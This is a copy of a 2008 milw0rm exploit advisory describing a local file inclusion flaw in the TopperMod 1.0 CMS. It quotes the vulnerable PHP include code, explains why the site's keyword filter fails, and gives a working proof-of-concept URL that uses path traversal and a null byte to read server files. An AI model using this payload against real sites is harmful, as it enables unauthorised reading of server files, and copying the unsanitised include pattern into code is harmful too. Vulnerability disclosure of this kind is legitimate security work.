TopperMod 1.0 mod.php Local File Inclusion Vulnerability

Document Sample
TopperMod 1.0 mod.php Local File Inclusion Vulnerability Powered By Docstoc
					                           TopperMod 1.0 mod.php Local File Inclusion Vulnerability                                  Page 1/1
   1    # Author:         __GiReX__
   2    # mySite:         girex.altervista.org
   3
   4    # CMS:            TopperMod v1.0
   5    # Site:           rtcw.ch/mio/index.php
   6
   7    # Bug:            Local File Inclusion
   8    # File:           mod.php
   9    # Var :           $to
   10
   11
   12   # Bug explanation − Vuln Code:
   13
   14             if (isset($_GET[’mod’])) { $mod = stripslashes($_GET[’mod’]); } else { header("location index.php"); Die(); }
   15             if (isset($_GET[’to’])) { $to = stripslashes($_GET[’to’]); } else { $to="index"; }
   16
   17   # Our bugged vars are GET’s var so we don’t need Register_Globals turned On
   18
   19
   20             $vietate=array("http","select","union","where","delete","insert","alert","document");
   21                     if (ereg($vietate,strtolower($mod)) OR ereg($vietate,strtolower($to)) ) {
   22                             echo "<META HTTP−EQUIV=\"refresh\" content=\"1;URL=index.php\">";
   23                     } elseif (ereg("[a−zA−Z0−9]",$mod) OR ereg("[a−zA−Z0−9]",$to)) {
   24
   25   # Our exploitation don’t use a $vietate word and
   26   # the check of ereg() return true if we use some letters
   27
   28
   29     ...
   30   # ... we must be logged in and $mod must be a real section
   31     ...
   32
   33
   34             if (file_exists("mod/$mod/".$to.".php") ) {
   35                      include("mod/$mod/".$to.".php");
   36             } else {
   37                      echo "<META HTTP−EQUIV=\"refresh\" content=\"1;URL=index.php\">";
   38                                      }
   39
   40   # var $to is not sanizated so we can exploit thought Local File Inclusion
   41
   42
   43   PoC:   [host]/[path]/mod.php?mod=account&to=../../[local file]%00
   44
   45   # milw0rm.com [2008−03−25]




girex                                                                                                                 03/25/2008

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:19
posted:5/24/2010
language:English
pages:1